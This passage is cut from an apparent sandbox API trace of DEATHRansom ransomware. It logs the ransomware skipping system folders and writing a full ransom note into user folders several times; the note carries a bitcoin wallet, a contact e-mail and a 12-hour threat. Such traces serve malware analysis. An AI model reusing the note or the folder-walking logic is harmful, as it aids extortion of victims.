websites", lpSrch="program files") returned 0x0 [0076.164] StrStrW (lpFirst="msn websites", lpSrch="windows") returned 0x0 [0076.164] StrStrW (lpFirst="msn websites", lpSrch="all users") returned 0x0 [0076.164] StrStrW (lpFirst="msn websites", lpSrch="appdata") returned 0x0 [0076.164] GetProcessHeap () returned 0x4f10000 [0076.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c80048 [0076.164] lstrcpyW (in: lpString1=0x8c80048, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites" [0076.164] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 107 [0076.164] QueueUserWorkItem (Function=0x40a710, Context=0x8c80048, Flags=0x0) returned 1 [0076.164] GetProcessHeap () returned 0x4f10000 [0076.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b600b8 [0076.165] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*") returned 45 [0076.165] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.195] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\.") returned 45 [0076.195] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.195] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.195] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.201] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\..") returned 46 [0076.201] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.201] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0076.201] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0076.201] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0076.201] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0076.201] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0076.201] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0076.201] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0076.201] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0076.201] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0076.201] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0076.201] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0076.201] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0076.201] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0076.201] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.202] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\read_me.txt") returned 55 [0076.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\read_me.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x930 [0076.203] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.203] WriteFile (in: hFile=0x930, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.204] CloseHandle (hObject=0x930) returned 1 [0076.204] GetProcessHeap () returned 0x4f10000 [0076.204] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600b8 | out: hHeap=0x4f10000) returned 1 [0076.204] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0076.204] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live") returned 43 [0076.204] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0076.204] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0076.204] StrStrW (lpFirst="windows live", lpSrch="programdata") returned 0x0 [0076.205] StrStrW (lpFirst="windows live", lpSrch="$recycle.bin") returned 0x0 [0076.205] StrStrW (lpFirst="windows live", lpSrch="program files") returned 0x0 [0076.205] StrStrW (lpFirst="windows live", lpSrch="windows") returned="windows live" [0076.205] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="windows live", cAlternateFileName="WINDOW~1")) returned 0 [0076.205] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.205] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\read_me.txt") returned 42 [0076.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\read_me.txt" (normalized: "c:\\users\\default\\favorites\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0076.205] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.205] WriteFile (in: hFile=0x79c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.206] CloseHandle (hObject=0x79c) returned 1 [0076.206] GetProcessHeap () returned 0x4f10000 [0076.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.206] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Links", cAlternateFileName="")) returned 1 [0076.207] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links") returned 26 [0076.207] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0076.207] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0076.207] StrStrW (lpFirst="links", lpSrch="programdata") returned 0x0 [0076.207] StrStrW (lpFirst="links", lpSrch="$recycle.bin") returned 0x0 [0076.207] StrStrW (lpFirst="links", lpSrch="program files") returned 0x0 [0076.207] StrStrW (lpFirst="links", lpSrch="windows") returned 0x0 [0076.207] StrStrW (lpFirst="links", lpSrch="all users") returned 0x0 [0076.207] StrStrW (lpFirst="links", lpSrch="appdata") returned 0x0 [0076.207] GetProcessHeap () returned 0x4f10000 [0076.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0076.209] lstrcpyW (in: lpString1=0x8ad0070, lpString2="\\\\?\\C:\\Users\\Default\\Links" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links") returned="\\\\?\\C:\\Users\\Default\\Links" [0076.209] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 108 [0076.209] QueueUserWorkItem (Function=0x40a710, Context=0x8ad0070, Flags=0x0) returned 1 [0076.209] GetProcessHeap () returned 0x4f10000 [0076.209] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d510b8 [0076.210] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\*") returned 28 [0076.210] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.259] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\.") returned 28 [0076.259] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.259] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.259] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.259] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\..") returned 29 [0076.259] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.259] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.259] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0076.259] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0076.259] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0076.259] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0076.259] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0076.259] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0076.259] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0076.259] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0076.259] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.260] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\read_me.txt") returned 38 [0076.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\read_me.txt" (normalized: "c:\\users\\default\\links\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0076.309] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.309] WriteFile (in: hFile=0x79c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.310] CloseHandle (hObject=0x79c) returned 1 [0076.310] 